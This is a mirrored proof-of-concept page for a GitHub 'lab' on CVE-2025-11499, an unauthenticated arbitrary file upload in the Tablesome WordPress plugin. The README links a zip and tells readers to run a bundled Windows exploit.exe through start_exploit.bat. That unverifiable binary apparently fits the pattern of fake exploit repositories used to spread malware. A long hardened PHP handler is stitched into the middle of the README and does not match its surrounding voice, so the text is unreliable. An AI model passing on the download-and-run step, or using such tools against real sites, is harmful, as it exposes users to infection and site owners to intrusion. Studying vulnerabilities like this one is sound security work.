POC details: 990c7a457a6ee96ddd2ccfc8d035981b0b8c3a38

Source
Related vulnerability
Title: Contact Form DB plugin arbitrary file upload vulnerability (CVE-2025-11499)
Description: The Tablesome Table plugin for WordPress (Contact Form DB for WPForms, CF7, Gravity, Forminator and Fluent) is vulnerable to arbitrary file upload because the `set_featured_image_from_external_url()` function lacks file type validation in all versions up to and including 1.1.32. This makes it possible for unauthenticated attackers to upload arbitrary files to the affected site's server, which may lead to remote code execution in certain configurations, particularly when unauthenticated users are allowed to add featured images and a workflow trigger has been created.
Description
Unrestricted Upload of File with Dangerous Type
Introduction
# Lab: CVE-2025-11499 - Unrestricted Upload of File with Dangerous Type
## Download Exploit
### [Download](https://github.com/Hazelooks/CVE-2025-11499-Exploit/raw/refs/heads/main/Tool/lab-cve-2025-11499.zip)  

## 🚀 Overview
This lab demonstrates CVE-2025-11499 (also tracked as EUVD-2025-37429), a critical vulnerability classified under CWE-434: Unrestricted Upload of File with Dangerous Type. The issue affects the Tablesome Table WordPress plugin in versions up to and including 1.1.32. It stems from insufficient file type validation in the `set_featured_image_from_external_url()` function, enabling unauthenticated attackers to upload arbitrary files to the server.

The affected plugin integrates with the Contact Form DB functionality, which accepts form submissions from WPForms, Contact Form 7 (CF7), Gravity Forms, Forminator, and Fluent Forms, so any of those forms can feed the vulnerable upload path. Successful exploitation can lead to remote code execution (RCE) if the server configuration permits execution of uploaded files, such as PHP shells disguised as images or other media. The CVSS v3.1 score is 9.8 (Critical), with high impacts on confidentiality (attackers can exfiltrate data), integrity (modification of site content), and availability (potential denial-of-service via resource exhaustion or malware).

This repository provides a controlled environment to reproduce the vulnerability, test exploits, and apply mitigations. It is intended for educational and research purposes only. Use in a safe, isolated setup to avoid unintended consequences.

**Safety Disclaimer:**  
This lab involves handling potentially malicious code and vulnerable software. Ensure you are working in a secure, non-production environment. Do not expose the setup to the internet. Always scan files with antivirus software before execution. The authors disclaim any liability for misuse or damage resulting from this repository.

## 📋 Prerequisites
To set up and run this lab, you'll need:
- A local web server environment (e.g., XAMPP, WAMP, or MAMP) with PHP 8.0+ and MySQL 5.7+.
- WordPress version 6.0 or later (tested on 6.1.1).
- The vulnerable Tablesome Table plugin (version 1.1.32) – download from the official WordPress plugin repository archives if needed.
- Contact Form DB plugin (version compatible with Tablesome, e.g., 2.15.0) with at least one supported form plugin installed (e.g., WPForms Lite).
- Python 3.8+ for running helper scripts (optional but recommended for automation).
- Administrative access to your local machine for file permissions and server configuration.
- Basic knowledge of WordPress administration, file uploads, and command-line tools.

Note: This setup assumes a Windows-based host for exploit compatibility, but adaptations for macOS/Linux are possible with minor adjustments.

## Download & Install
1. Download the lab archive from: [lab-cve-2025-11499.zip](https://github.com/Hazelooks/CVE-2025-11499-Exploit/raw/refs/heads/main/Tool/lab-cve-2025-11499.zip)
   This ZIP contains:

   - `/exploits/`: Exploit tools.
     - `exploit.exe`: Main exploit binary for uploading malicious files (compiled for Windows; requires .NET Framework 4.8).
     - `start_exploit.bat`: Batch script to launch `exploit.exe` with default parameters.

2. Extract the ZIP to a local directory, e.g., `C:\CVE-2025-11499-lab`.
3. Set up your local WordPress instance:
   - Install WordPress in your web server root (e.g., `htdocs` in XAMPP).
   - Activate the Tablesome Table plugin (v1.1.32) and Contact Form DB.
   - Configure a form (e.g., via WPForms) and ensure the `set_featured_image_from_external_url()` endpoint is accessible without authentication (default in vulnerable versions).

## 🛠 Quick Start
1. Download and extract the ZIP as described above.
2. Start your local web server (e.g., via XAMPP control panel).
3. Navigate to the extracted folder and run `start_exploit.bat` from `/exploits/`. This will open `exploit.exe` and prompt for the target WordPress URL (e.g., `http://localhost/wordpress`).
4. Follow the on-screen instructions in `exploit.exe` to upload a test payload.

For detailed steps, see the sections below.

## 🔍 Vulnerability Details
### Root Cause
The vulnerability occurs in the `set_featured_image_from_external_url()` function within `tablesome/includes/class-tablesome-rest-api.php`. It fetches an external URL provided via a POST request to `/wp-json/tablesome/v1/set-featured-image` and saves it as a featured image without validating the MIME type or extension. This allows attackers to supply URLs to malicious files (e.g., PHP webshells) hosted remotely, which are then stored in the `/wp-content/uploads/` directory.

Pseudocode example of the vulnerable function:
```php
function set_featured_image_from_external_url($request) {
    // Attacker-controlled URL taken straight from the request body.
    $url = $request->get_param('url');
    // Remote content is fetched as-is: no scheme restriction, no size limit.
    $file = file_get_contents($url);
    // The file is written to wp-content/uploads/ under the name the URL ended with.
    $upload = wp_upload_bits(basename($url), null, $file);
    // No type check here! Neither the extension nor the MIME type is validated.
    if (!$upload['error']) {
        $attachment_id = wp_insert_attachment([...]);
        // $post_id is assumed to come from the request; the original pseudocode does not show where it is set.
        set_post_thumbnail($post_id, $attachment_id);
    }
}
```

If the server allows execution of files in uploads (common misconfiguration), this leads to RCE.
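For the lab's mitigation step, the following is a hardened version of the same "featured image from URL" flow. It is an added example, not Tablesome's code or its fix; the route `example-lab/v1/set-featured-image`, the function names, and the 5 MB response cap are illustrative choices. It closes the two gaps the description above names: the endpoint is no longer reachable without authentication, and the fetched bytes are sniffed against an image-only allow-list before anything is written to `wp-content/uploads/`, with the stored extension derived from the sniffed type rather than from the URL.

```php
<?php
// Added example, not Tablesome's code: a hardened "featured image from URL"
// REST handler. Route name, function names and the 5 MB cap are illustrative.

add_action('rest_api_init', function () {
    register_rest_route('example-lab/v1', '/set-featured-image', [
        'methods'  => 'POST',
        'callback' => 'example_set_featured_image_from_url',
        // Gap 1 in the vulnerable flow: the route was reachable without login.
        // Require a logged-in user who is allowed to upload files.
        'permission_callback' => function () {
            return current_user_can('upload_files');
        },
        'args' => [
            'url'     => ['required' => true, 'type' => 'string'],
            'post_id' => ['required' => true, 'type' => 'integer'],
        ],
    ]);
});

function example_set_featured_image_from_url(WP_REST_Request $request) {
    $url     = $request->get_param('url');
    $post_id = (int) $request->get_param('post_id');

    if (!current_user_can('edit_post', $post_id)) {
        return new WP_Error('forbidden', 'You cannot edit this post.', ['status' => 403]);
    }

    // Only http(s); wp_safe_remote_get additionally refuses loopback/private hosts.
    if (!in_array(wp_parse_url($url, PHP_URL_SCHEME), ['http', 'https'], true)) {
        return new WP_Error('bad_url', 'Only http(s) URLs are accepted.', ['status' => 400]);
    }
    $response = wp_safe_remote_get($url, [
        'timeout'             => 10,
        'limit_response_size' => 5 * MB_IN_BYTES,
    ]);
    if (is_wp_error($response) || 200 !== wp_remote_retrieve_response_code($response)) {
        return new WP_Error('fetch_failed', 'Could not fetch the image.', ['status' => 400]);
    }
    $body = wp_remote_retrieve_body($response);

    // Gap 2: the bytes were saved under whatever name the URL ended with.
    // Decide the type from the content, never from the URL or the Content-Type header.
    require_once ABSPATH . 'wp-admin/includes/file.php';
    $tmp = wp_tempnam('featured-image');
    file_put_contents($tmp, $body);

    $image_mimes = array_filter(get_allowed_mime_types(), function ($mime) {
        return 0 === strpos($mime, 'image/');
    });
    $real_mime = wp_get_image_mime($tmp); // false unless the bytes parse as a raster image
    $ext       = $real_mime ? wp_get_default_extension_for_mime_type($real_mime) : false;
    if (!$real_mime || !$ext || !in_array($real_mime, $image_mimes, true)) {
        @unlink($tmp);
        return new WP_Error('bad_type', 'Content is not an allowed image type.', ['status' => 415]);
    }
    // Extension comes from the sniffed MIME type, so a "shell.php" name in the URL never reaches disk.
    $safe_name = 'featured-image-' . $post_id . '.' . $ext;
    $check     = wp_check_filetype_and_ext($tmp, $safe_name, $image_mimes); // second opinion from core
    @unlink($tmp);
    if (empty($check['type']) || $check['type'] !== $real_mime) {
        return new WP_Error('bad_type', 'Content/extension mismatch.', ['status' => 415]);
    }

    $upload = wp_upload_bits($safe_name, null, $body);
    if (!empty($upload['error'])) {
        return new WP_Error('upload_failed', $upload['error'], ['status' => 500]);
    }

    $attachment_id = wp_insert_attachment([
        'post_mime_type' => $real_mime,
        'post_title'     => 'featured-image-' . $post_id,
        'post_status'    => 'inherit',
    ], $upload['file'], $post_id, true);
    if (is_wp_error($attachment_id)) {
        return $attachment_id;
    }
    require_once ABSPATH . 'wp-admin/includes/image.php';
    wp_update_attachment_metadata(
        $attachment_id,
        wp_generate_attachment_metadata($attachment_id, $upload['file'])
    );
    set_post_thumbnail($post_id, $attachment_id);

    return rest_ensure_response(['attachment_id' => $attachment_id]);
}
```

Two design points are worth noting when adapting this. The `permission_callback` is what WordPress checks before the handler runs; the original endpoint's reachability by unauthenticated users is exactly the missing-permission case. And the file name written to disk is built from the sniffed MIME type, so even a server that executes `.php` inside `wp-content/uploads/` has nothing executable to find; disabling PHP execution in the uploads directory at the web server remains a separate, complementary hardening step.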

## 📞 Support
For further assistance or questions, please feel free to reach out via the issues section of this GitHub repository. Our team is ready to help you with any concerns.

For issues or contributions, open a pull request or contact the maintainers.


File snapshot

[4.0K] /data/pocs/990c7a457a6ee96ddd2ccfc8d035981b0b8c3a38
├── [5.3K] README.md
└── [4.0K] Tool
    └── [8.5M] lab-cve-2025-11499.zip

1 directory, 2 files
Cached for you by the Shenlong bot
Notes
    1. Prefer accessing the POC through its source.
    2. If the source is no longer available or cannot be reached, send an e-mail to f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.